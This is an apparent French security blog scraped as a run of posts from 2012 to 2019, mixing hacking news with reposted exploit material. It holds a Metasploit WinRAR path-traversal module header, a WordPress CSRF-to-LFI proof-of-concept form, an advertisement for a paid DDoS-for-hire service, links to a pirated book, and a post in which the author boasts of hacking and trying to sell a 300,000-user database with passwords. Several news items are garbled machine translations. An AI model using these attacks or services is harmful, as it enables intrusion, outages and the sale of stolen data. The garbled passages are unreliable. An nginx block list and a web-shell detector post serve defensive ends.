Posted on dimanche 28 avril 2019 -
super(update_info(info,
'Name' => 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution',
'Description' => %q{
In WinRAR versions prior to and including 5.61, there is path traversal vulnerability
when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename
field is manipulated with specific patterns, the destination (extraction) folder is
ignored, thus treating the filename as an absolute path. This module will attempt to
extract a payload to the startup folder of the current user. It is limited such that
we can only go back one folder. Therefore, for this exploit to work properly, the user
must extract the supplied RAR file from one folder within the user profile folder
(e.g. Desktop or Downloads). User restart is required to gain a shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nadav Grossman',
'Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>'
],
'References' =>
[
['CVE', '2018-20250'],
['EDB', '46552'],
['BID', '106948'],
['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'],
['URL', 'https://apidoc.roe.ch/acefile/latest/'],
['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'],
],
'Platform' => 'win',
source : https://www.exploit-db.com/exploits/46756
Posted on -
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`
All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
PoC
---
```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
source
https://www.exploit-db.com/exploits/46734
Posted on jeudi 20 novembre 2014 -
A2T,
Agence Technique des Télécommunications tunisienne,
ATT,
kgb,
nsa
L'accès non autorisé et la surveillance sur les ordinateurs personnels par les gouvernements de les agences d'espionnage a suscité de vifs débats sur les droits plutôt qu'aux États de confidentialité de mesures de sécurité, recevant de grandes quantités d'attention des groupes internationaux des droits de l'homme.
Un grand nombre de documents, une valeur importante valeur, ont récemment fait surface, indiquant l'étendue de l'espionnage des activités sur les ordinateurs personnels par l'Agence américaine de sécurité nationale (NSA) et de leurs partenaires (
Agence Technique des Télécommunications tunisienne & A2T & ATT ), y compris le Government Communications Headquarters du Royaume-Uni (GCHQ) et d'autres organismes internationaux de surveillance »liens.
Un groupe de droits de l'homme et les organisations de la technologie Amnesty International et "ont lancé un nouvel outil anti-espionnage, à la suite des préoccupations au sujet de la protection des libertés civiles des citoyens contre le gouvernement d'espionnage au nom de la sécurité nationale, qui est particulièrement répandue contre les journalistes et humain les militants des droits.
Le nouveau logiciel, Détecter, permettrait à ses utilisateurs de scanner leurs ordinateurs pour l'activité d'espionnage suspect. Détecté avertit ses utilisateurs lorsqu'une activité suspecte est identifiée et suggérer que l'utilisateur déconnecte le dispositif de l'Internet et l'arrête.
Detekt, le premier logiciel anti-espionnage disponible pour le public, est disponible au téléchargement pour tous ceux qui craint que leur ordinateur a été victime de la surveillance du gouvernement, même si elle a été conçue pour protéger les journalistes et les militants des droits de l'homme.
Dans le cadre du lancement, Amnesty International aider et informer les militants dans le monde entier sur Detekt et analyser leurs appareils pour des signes de spyware.
«Les gouvernements sont de plus en plus recours à la technologie dangereuse et sophistiqué qui leur permet de lire des militants et des e-mails privés des journalistes et allumer à distance la caméra ou au microphone de son ordinateur pour enregistrer secrètement leurs activités. Ils utilisent la technologie dans une lâche tentative pour éviter les abus d'être exposé, », a déclaré Marek Marczynski, chef de militaire, de sécurité et de police à Amnesty International.
Posted on samedi 19 octobre 2013 -
2013,
ACSF 2013,
Africa,
Cyber Security,
Forum,
Hammamet,
Tunisie
Africa Cyber Security Forum 2013 (ACSF 2013) à Hammamet (Tunisie) le 11
et le 12 novembre 2013 #ACSF2013 #ACSFhttp://www.acsf2013.org/
Posted on lundi 19 novembre 2012 -
Ddos testing,
simulate hacker attacks,
testing resistance to attacks
Ddos testing / testing resistance to attacks / simulate hacker attacks

We provide the service , which will test loads and to determine resistance to hacking attacks your websites, servers, legitimate means . DDoS attacks are very common today, and know how it can affect the performance of your site is not unimportant. You show us a target and we will organize DDoS attack on her. Any questions about ddos attacks ask, we will try to help you.
Suggest DDOS services to address the various sites, servers, and other Internet resources.
DDoS-attack (from the English. Distributed Denial of Service - a distributed denial of service attack, "denial of service").
The attack on the computer system in order to bring it to the full, that is, to create conditions under which legitimate users of the system can not access the provided system resources (servers), or that the access is difficult.
Service Features:
• Complete anonymity
• Service without the mediation
• Reasonable prices for excellent quality
• Preliminary test before ordering
• Continuous monitoring of the victim to
• Different types of attacks, including the different protocols and ports
• Return of funds in the event of failure or cancellation
Price of service:
• 3 $ - per hour
• $ 30 - per day
• from $ 150 - per week
• from $ 500 - per month
(price depends on the attacked target)
Methods of payment:
• WebMoney
CONTACTS:
Posted on dimanche 12 août 2012 -
file injection,
hacking,
nginx,
spam,
SQL injection,
web server,
xss
Petite astuce si vous utilisez Nginx et que vous souhaitez vous prémunir simplement de la plupart des exploits, injections SQL, injections de fichiers, spam et pompeurs de bande passante et hackers aux user-agent plus que louche...
Il suffit de rajouter dans vos vhosts nginx la config suivante dans un conteneur server{}. Vous remarquerez probablement que la règle concernant wget est mise en commentaires.
C'est par précaution car souvent, les CMS que nous utilisons se servent de wget dans leurs jobs cron. Mais si ce n'est pas le cas pour vous, alors vous pouvez décommenter cette partie.
server {
## Block SQL injections
set $block_sql_injections 0;
if ($query_string ~ "union.*select.*\(") {
set $block_sql_injections 1;
}
if ($query_string ~ "union.*all.*select.*") {
set $block_sql_injections 1;
}
if ($query_string ~ "concat.*\(") {
set $block_sql_injections 1;
}
if ($block_sql_injections = 1) {
return 403;
}
## Block file injections
set $block_file_injections 0;
if ($query_string ~ "[a-zA-Z0-9_]=http://") {
set $block_file_injections 1;
}
if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") {
set $block_file_injections 1;
}
if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") {
set $block_file_injections 1;
}
if ($block_file_injections = 1) {
return 403;
}
## Block common exploits
set $block_common_exploits 0;
if ($query_string ~ "(<|%3C).*script.*(>|%3E)") {
set $block_common_exploits 1;
}
if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") {
set $block_common_exploits 1;
}
if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") {
set $block_common_exploits 1;
}
if ($query_string ~ "proc/self/environ") {
set $block_common_exploits 1;
}
if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") {
set $block_common_exploits 1;
}
if ($query_string ~ "base64_(en|de)code\(.*\)") {
set $block_common_exploits 1;
}
if ($block_common_exploits = 1) {
return 403;
}
## Block spam
set $block_spam 0;
if ($query_string ~ "\b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)\b") {
set $block_spam 1;
}
if ($query_string ~ "\b(erections|hoodia|huronriveracres|impotence|levitra|libido)\b") {
set $block_spam 1;
}
if ($query_string ~ "\b(ambien|blue\spill|cialis|cocaine|ejaculation|erectile)\b") {
set $block_spam 1;
}
if ($query_string ~ "\b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)\b") {
set $block_spam 1;
}
if ($block_spam = 1) {
return 403;
}
## Block user agents
set $block_user_agents 0;
# Don't disable wget if you need it to run cron jobs!
#if ($http_user_agent ~ "Wget") {
# set $block_user_agents 1;
#}
# Disable Akeeba Remote Control 2.5 and earlier
if ($http_user_agent ~ "Indy Library") {
set $block_user_agents 1;
}
# Common bandwidth hoggers and hacking tools.
if ($http_user_agent ~ "libwww-perl") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "GetRight") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "GetWeb!") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "Go!Zilla") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "Download Demon") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "Go-Ahead-Got-It") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "TurnitinBot") {
set $block_user_agents 1;
}
if ($http_user_agent ~ "GrabNet") {
set $block_user_agents 1;
}
if ($block_user_agents = 1) {
return 403;
}
}
Une fois que c'est en place, n'oubliez pas de redémarrer Nginx.
/etc/init.d/nginx reload
Posted on -
c100,
c99,
exploit,
hacking,
php shell,
r57,
root shell,
web shell
Je ne sais pas si tout le monde ici sait exactement ce que sont les web shells comme C99 ou R57, mais je vais tenter de vous expliquer rapidement... Les web shell sont des scripts le plus souvent développé en PHP, ASP, ou CGI (mais y'en a dans tous les langages) qui permettent d’interagir via HTTP avec le système (c'est à dire le serveur).
Les pirates s'en servent pour, à partir d'une faille d'injection simple de fichier, avoir la main sur le serveur et à distance pouvoir gérer les fichiers, lancer des commandes, gérer le MySQL...etc. C'est comme s'ils avaient un SSH sous les yeux si vous préférez.
Peut être, avez vous, sans le savoir un de ces scripts de web shells qui tournent en ce moment même sur votre serveur ? Mais comment le savoir ?
Et bien pour cela, il existe un autre script (en PHP cette fois) qui s'appelle PHP Shell Detector et dont la fonction principale est de scanner votre serveur à la recherche justement de ces web shells dangereux. Pour cela, il se base sur un certain nombre de critères afin de déterminer une signature pour chaque shell.
Ensuite, à vous de voir pour faire le ménage !
Posted on -
amazon,
fusil
Il commande une TV sur Amazon et se retrouve avec un fusil d’assault
Alors ça c'est fort !
Seth Horvitz, un habitant de Washington, D.C. a commandé un téléviseur sur Amazon... Et le jour de la livraison, il s'est retrouvé avec un SIG716 Patrol Rifle, c'est à dire un fusil d'assault semi automatique, d'ailleurs interdit dans l'Etat de Washington.
Le beau gosse !
Il y gagne au change car la TV coutait que 320 $ alors que ce petit joujou coûte 1590 $.
L'erreur proviendrait d'UPS qui s'est merdé sur les étiquettes, le fusil étant destiné à une armurerie en Pennsylvanie...
J'imagine la grosse surprise du gars en tout cas. Et vous, ça vous ai déjà arrivé de recevoir des trucs chelous par erreur grâce au ecommerce ?
Posted on -
confidentialité,
facebook,
mark zuckerberg
Le célèbre milliardaire Mark Zuckerberg n'aura pas eu suffisament de temps pour supprimer une photo de lui à moitié nu sur son propre réseau social Facebook. En seulement quelques minutes, l'image en question fait déjà le tour du net !
Le fondateur du réseau social Facebook, Mark Zuckerberg, est apparu torse-nu sur une photographie publiée par erreur sur le réseau. Sur cette photo, il se trouve à moitié nu entouré d'autres hommes, également torse nu dans une maison. Il doit s'agir d'une erreur au niveau de la confidentialité, comme quoi le fondateur peut être également victime de cette fameuse politique, comme n'importe qui !
On peut également voir sur ce cliché Andrew Bosworth le directeur du service ingénierie de Facebook, qui a immédiatement supprimé l'image, mais trop tard...rien de choquant, mais voilà un cliché qui risque de faire rire beaucoup de monde sortie de son contexte.
Posted on samedi 11 août 2012 -
Blizzard,
Diablo,
hacked,
password,
Starcraft,
Word of Warcraft
Sérieuse alerte pour Blizzard : l’éditeur de Diablo, Starcraft et Word of Warcraft est frappé par une tentative réussie de piratage de ses serveurs datant du 4 août. Des millions de comptes de joueurs ont en effet été hackés, mettant en danger l’intégrité de leurs données.
Dans le détail, ce sont les adresses courriels, les réponses aux questions secrètes, les mots de passe cryptés et d’autres informations qui ont été volées par un pirate non identifié publiquement. Il semble cependant que les données liées aux comptes bancaires ne soient pas en danger, et que les informations subtilisées n’aient pas encore été partagées.
Blizzard encourage vivement les utilisateurs abonnés à ses services de filer sur Battle.net et de modifier aussi vite que possible leurs mots de passe.
Posted on -
arabe hackers,
israel,
Israël,
webgate
Un groupe de Hacker appelé "Se souvenir de Emad" prétend qu'il a pris le contrôle d'un serveur israélien • Le groupe a publié des listes de mots de passe pour les pages Facebook, numéros de cartes de crédit et des adresses électroniques appartenant à des Israéliens.
Un groupe de hacker, apparemment d'un pays arabe ou des pays, a affirmé mercredi qu'il avait violé le serveur de l'entreprise WebGate israélienne et les informations compromises sa base de données.
Selon Israël Hayom rapport, Le groupe de hacker a dit qu'il allait publier l'information qu'il a recueillie dans les stades, et a déjà publié des listes contenant des renseignements personnels, mots de passe Facebook, des images de chèques et numéros de carte de crédit appartenant à des milliers d'Israéliens.
"WebGate est considéré comme le plus grand centre de 10e israélienne de données. Elle accueille plus de 6000 domaines israéliennes et sous-domaines." Hacker dit. "Aujourd'hui, nous allons publier la première partie de ses données. Nous avons des téraoctets de données à partir de WebGate, mais le téléchargement du morceau ensemble de données sur nos serveurs va prendre du temps, nous avons donc décidé de les publier progressivement."
Les données publiées mercredi inclus une prétendue liste de mille noms d'utilisateur, mots de passe et adresses e-mail des membres de radiodiffusion d'Israël forum Autorité. Une liste de numéros de cartes de crédit appartenant à des Israéliens a également été publié, bien que quelques-unes des cartes ont été connus comme ayant expiré.
Les pirates ont également affirmé avoir manqué à la page de la conférence des présidents, parrainée par le président Shimon Peres, et a révélé des détails personnels sur l'administrateur WebGate.
Posted on mercredi 25 juillet 2012 -
google,
service,
sms
Google a annoncé la semaine dernière le lancement d’un nouveau service spécialement pour l’Afrique qui permet aux utilisateurs de Gmail de pouvoir envoyer et recevoir des emails directement depuis leur téléphone, comme s’ils envoyaient des sms.
Ce nouveau service appelé Gmail SMS ne sera disponible que pour Le Ghana, le Nigeria ainsi que le Kenya. Ces trois pays sont les seuls à pouvoir en profiter pour le moment en espérant que Google le développe dans d’autre régions. Au niveau du fonctionnement, les e-mails seront automatiquement adaptés au format SMS afin de faciliter la transmission de mails. Les utilisateurs pourront ainsi répondre à leurs mails aussi facilement que si ils recevaient un texto.
Posted on lundi 23 juillet 2012 -
hack the stack,
hacking hackers,
security tools,
torrent,
warez
Hack the Stack - Using Snort and Ethereal to Master the 8 Layers of an Insecure Network
Publisher: Syngress | ISBN: 1597491098 | edition 2007 | PDF | 486 pages | 11,3 mb
This book is designed to offer readers a deeper understanding of many common vulnerabilities and the ways in which attacker's exploit, manipulate, misuse, and abuse protocols and applications. The authors guide the readers through this process by using tools such as Ethereal (sniffer) and Snort (IDS). The sniffer is used to help readers understand how the protocols should work and what the various attacks are doing to break them. IDS is used to demonstrate the format of specific signatures and provide the reader with the skills needed to recognize and detect attacks when they occur.
Download links:
(Become Premium for maximum speed, resumming ability and no waiting):
http://rapidgator.net/file/27001661/1597491098.pdf.html
Mirror:
http://letitbit.net/file/27001879/1597491098.pdf.html
Posted on jeudi 19 juillet 2012 -
anonymous,
backdoor,
FBI,
microsoft,
skype,
Skype source code,
trojan,
voiIP,
zataz.com
The group Anonymous cybercitizens the source code for software Skype Internet telephone conversation. Microsoft acquired, there is little, the system / communication software Skype. Of VoIP has reported that $ 8.5 billion to the authors of this tool of Internet telephony. The Anonymous accuse Microsoft of wanting to install a backdoor, a hidden door in the software, to enable governments, including that of Uncle Sam, to decipher the conversations. The strength of Skype being unable to "listen" to a call. In response to this fear, Anonymous has released more source code of Skype. The holy grail 3 files distributed via the P2P. In data released: Skype1.4_binaries; SkypeKit_sdk + runtimes_370_412.zip; skypekit binaries for Windows and x86_Linux + SDK for Windows and skype55_59_deobfuscated_binaries. Suffice to say that the data are very sensitive.
The group Anonymous cybercitizens the source code for software Skype Internet telephone conversation. Microsoft acquired, there is little, the system / communication software Skype. Of VoIP has reported that $ 8.5 billion to the authors of this tool of Internet telephony. The Anonymous accuse Microsoft of wanting to install a backdoor, a hidden door in the software, to enable governments, including that of Uncle Sam, to decipher the conversations. The strength of Skype being unable to "listen" to a call. In response to this fear, Anonymous has released more source code of Skype. The holy grail 3 files distributed via the P2P. In data released: Skype1.4_binaries; SkypeKit_sdk + runtimes_370_412.zip; skypekit binaries for Windows and x86_Linux + SDK for Windows and skype55_59_deobfuscated_binaries. Suffice to say that the data are very sensitive.
In 2007, ZATAZ.COM was surprised at the remarks made by the German police about Skype. German police indicated at an annual meeting of security, she was unable to decipher the encryption used in the Internet telephone software Skype. Can not control the calls made on individuals suspected of a crime or an act of terrorism. "The encryption used by this software makes our job difficult," will explain Joerg Ziercke, president of the Federal Bureau of the German police (Germany's Federal Police Office - BKA). We were amazed by indicating five years, "This is a new promotion perplexing! Why talk about a program that seems so disturbing, if not to encourage" bad guys "to use it for better ... listen! "
German spy software, business friends
The spyware German police, a program concocted by friends of the interior minister of the country. ZATAZ.COM was the first newspaper to return to the surprising discovery of CCC in Berlin. Members of the Chaos Computer Club had received from an unknown spyware BKA (Bunderstrojan). A spyware, a Trojan, the German police [Read]. A trojan that made it much more than that were authorized by law Teutonic. Since the tool is making waves at the point of view out snakes larger than an ox. Behind this tool, the company DigiTask GmbH. The latter had already made an offer of "service" in 2007 with the Department of the Interior of Bavaria to promote espionage Skype.

In addition to having features worthy of trojans cybercriminals, the Chaos Computer Club has shown that Bunderstrojan could be hijacked by cybercriminals. For information, call ZATAZ.COM that Digitask GmbH is a German company 100% owned by the consortium Deloitte Consulting. An economic entity which has, as members of the advisory German political figures such as the Interior Minister of Bavaria Edmund Stoiber and former German Minister of Interior Otto Schily.
The trojan BKA, an investigative tool questionable?
Ralf Benzmüller, Director of G Data Security Labs, the trojan has several technical limitations. "Communication is a server control example insufficiently secure, says he ZATAZ.COM. A malware can then send any data from a forged address to the central server. This makes the evidence collected in any questionable police investigations. Conversely, cybercriminals can also order the infected PC and inject any malicious code. "The virus, with the source code posted on the web, detects BKA. "Cybercriminals are now able to locate the trojan infected PC and use them for themselves by injecting their malicious code via the upload function available" emphasizes ZATAZ.COm Ralf Benzmüller.
Posted on lundi 16 juillet 2012 -
exploit,
hack,
Minecraft,
oday,
video game
Une faille de sécurité a été découverte dans les serveurs de Minecraft, permettant via le système d'authentification de se logguer avec le compte d'un autre et de jouer avec son personnage.
Marcus Persson alias Notch s'en est rendu compte il y a quelques jours lorsque plusieurs joueurs ont remarqué que son compte personnel avait été utilisé sur différents serveurs où il n'a jamais mis ses pieds virtuels.
Cet exploit dont vous trouverez
tous les détails ici, concernait uniquement les gens qui ont migré récemment leur compte vers un compte Mojang et qui utilisent leur adresse email pour s'authentifier.
Mais rassurez-vous, Notch a tout de suite réagi à ce problème en coupant les serveurs servant à l'authentification afin d'analyser le problème et le patcher en quelques heures.
Rapide le garçon ! Heureusement, aucune donnée personnelle ou mot de passe n'a été rendu visible via cet exploit, et bien sûr tout est revenu dans l'ordre au pays de cubes cubiques.
Posted on -
SQL injection
La Mole est un outil automatique SQL Injection d'exploitation. Tout ce que vous devez faire est de fournir une URL vulnérables et une chaîne valide sur le site que vous testez et The Mole permettra de détecter l'injection et de l'exploiter, soit en utilisant la technique de l'union ou d'une technique basée sur requête booléenne.
caractéristiques
- Soutien pour les injections en utilisant MySQL, MS-SQL Server, Postgres et bases de données Oracle.
Interface de ligne de commande.
- L'auto-complétion pour les commandes, les arguments de commande et les noms de base de données, tables et les colonnes.
Prise en charge de filtres, afin de contourner certaines IPS ou IDS règles en utilisant des filtres génériques, et la possibilité d'en créer de nouveaux facilement.
- Exploits Injections SQL par le biais de GET / POST / Cookie paramètres.
- Développé en Python 3.
Exploits injections SQL qui retournent des données binaires.
- Interpréteur de commandes puissant pour simplifier son utilisation.
Vous pouvez télécharger la v0.3 Mole ici:
windows
linux
Posted on samedi 14 juillet 2012 -
ANSI,
hackers tunisien,
k3vin mitnick,
Nobel El Houssine BOUBAKER,
sfax,
spammer,
web marketing,
web2com
Bonjour après une grande absence i am back pour vous expliquer un petit phénomène
dans cette article on va parler de la web marketing er spécialement a la mailing ou les spammer
je vais utiliser par exemple une agence de web marketing très connue dans le domaines situé en sfax
j ai contacté depuis 2 ou 3 année le directeur pour lui vendre la plus grande base de donnée en Tunisie
et il a refusé puisque il a aussi une partie de ma base de donnée que j ai déjà piraté avec mon équipe mais une chose trop importante il a affirmer qu'il a la même base avec même les mot de passe O_o une Gega base avec 300 000 utilisateur , 300 000 email => 300 000 mot de passe O_o donc j'ai essayé ce soir d'Etudier un peut ce système d'envoi de mail utiliser par l'agence
WEB2COM
j ai reçu plusieurs mail comme chaque jours , mails mails mails => SPAM
voila une copie de la code source de l'email :-D
avec une bonne en tête
c le 6 eme serveur héberger chez OVH
comme vous voyer la copyright du script qui est le responsable d'envoi des SPAM
après une petit recherche sur GOOGLE
Biensure je pense pas que l'agence WEB2COM va acheté cette application
c sure et 100 % qu'ils sont utilise la version NULLED
:-D
questions : avez vous confiance en WEB2COM si vous saviez qu il acheter et utilise des produits piraté et même des base de donnée piraté qui comporte généralement nos vrai mot de passe ???
est ce que agence national de la sécurité informatique contrôler et vérifier ces société de type spammer en Tunisie ??
désoler pour mes fautes en français et merci pour votre attentions
MR k3vin mitnick
(mes referencer )
Posted on jeudi 28 juin 2012 -
dotcom,
FBI,
kevin mitnick,
megaupload
Juridique - Célèbre hacker, traqué par le FBI puis condamné à cinq ans de prison en 1995, Kevin Mitnick, reconverti depuis plusieurs années en consultant, a apporté à son tour son soutien à Kim DotCom, visé par une demande d’extradition des Etats-Unis.
Malgré ses excentricités, mais surtout les charges retenues contre lui par les Etats-Unis, le patron de MegaUpload parvient à s’attirer les soutiens de personnalités reconnues. Après Steve Wozniak, c’est au tour de Kevin Mitnick de le soutenir officiellement.
« J’espère que tu gagneras » a ainsi écrit le célèbre hacker Kevin Mitnick sur tweeter, accompagnant son message d’un lien vers un clip musical. Le titre de la chanson « I Won't Back Down », c’est-à-dire « Je ne reculerai pas ».
Comme DotCom, visé par une demande d’extradition du gouvernement américain, Mitnick a été recherché par les autorités du pays pour des actes de piratage informatique dans les années 80 et 90.0000
Pourchassé par le FBI durant deux ans, il sera finalement arrêté en 1995 et passera cinq ans en prison. Depuis, Kevin Mitnick s’est reconverti en expert de la sécurité informatique et donne régulièrement des conférences.
Posted on -
Joshua Hicks “OxideDox”,
lex Hatala “kool+kake”,
Mark Caparelli“Cubby”,
Michael Hogue “xVisceral”,
Mir Islam “JoshTheGod”,
Sean Harper “Kabraxis314”
Le FBI vient de stopper plusieurs importants pirates informatiques, aux USA et plusieurs pays Européens, dont le leader du groupe UGNazi. 24 pirates informatiques, de 18 à 25 ans, viennent de finir entre les mains des agents du FBI. Une vaste opération signée "Carding". Une action menée dans 9 pays, dont les Etats-Unis. Dans le lot, des pirates informatiques connus par leurs vantadises sur Internet. Les voleurs numériques présumés sont (Source FBI) : Mark Caparelli“Cubby”; Sean Harper “Kabraxis314”; Alex Hatala “kool+kake”; Joshua Hicks “OxideDox”; Michael Hogue “xVisceral”; Mir Islam “JoshTheGod”; Peter Ketchum "IwearaMAGNUM”; et Steven Hansen “theboner1”.

A noter que “JoshTheGod” est le leader du groupe UGnazi, une team de pirates qui, depuis quelques semaines, se vantait sur Twitter de multiple actions et vols numériques, dont le piratage d'un serveur du FBI ou l'attaque par DDoS de Twitter. D'après des informations que ZATAZ.COM a pu avoir du FBI, 400.000 internautes ont été victimes des agissements de ce groupe de pirates pour un montant estimé de plus de 200 millions de dollars. A noter que 13 autres personnes ont été arrêtés hors du territoire américain. Six aux Royaumes-Unis, deux en Bosnie, une en Bulgarie, Norvége et Allemagne. Ali Hassan connu sous le pseudonyme de “Badoo,” a été arrêté en Italie; Lee Jason Juesheng, alias “iAlert, Jason Kato” a été arreté au Japon.
Lors de cette opération, des internautes ont été entendus en Australie, Canada, Danemark, et Macedonie. Les individus étaient tous membre d'un forum spécialisé [UC Site était en fait un site piége monté par le FBI depuis 2010] dans le "carding", le piratage de carte et données bancaires. Jarand Moen Romtveit, aka "zer0," a utilisé des outils de piratage pour voler des informations à partir des bases de données internes d'une banque, un hôtel, et de différents détaillants en ligne. Il a ensuite vendu les informations à d'autres pirates. En Février 2012, en échange d'un ordinateur portable, Romtveit a vendu des informations de carte de crédit à une personne qu'il croyait être un cardeur. Derriére l'acheteur, un agent du FBI.
Pour JoshTheGod, le fondateur de UGNAzi, le FBI a retrouvé 50.000 informations liées à des cartes bancaires volées. Il était le fondateur de carders.org, un forum de carding.
Posted on -
Arashi,
Hermes,
police russe,
russian hacker,
tunisian blackhat team
un pirate arrêté avait sous ses ordres plus de 4 millions d'ordinateurs infiltrés par ses soins. Les autorités policières russes ont arrêté un pirate informatique de 22 ans, qui serait prétendument responsable de la compromission de plus de 4,5 millions d'ordinateurs. Un réseau qui serait le plus grand "botnet" connu à ce jour selon le ministère de l'Intérieur Russe.
Le pirate aurait utilisé ses "zombies", des machines de particuliers et entreprises infiltrées, pour voler 150 millions de roubles (3,6 millions d'euros). Le jeune homme était connu sur la toile sous les pseudonymes de "Hermes" et "Arashi". Il utilisait des outils de types Carberp pour voler des informations d'identification d'accès à des banques.
La plupart des complices du pirate étaient basés à Moscou et à Saint-Pétersbourg. "Hermes" a été arrêté dans le sud de la Russie. Bref, 66 centimes d'euros par machine vérolée. Le prix de la visite dans une prison russe ! Maintenant, c'est les services secrets russes, et sa section K, qui ont plus de 4 millions de bots en poche. Et ce n'est pas plus rassurant !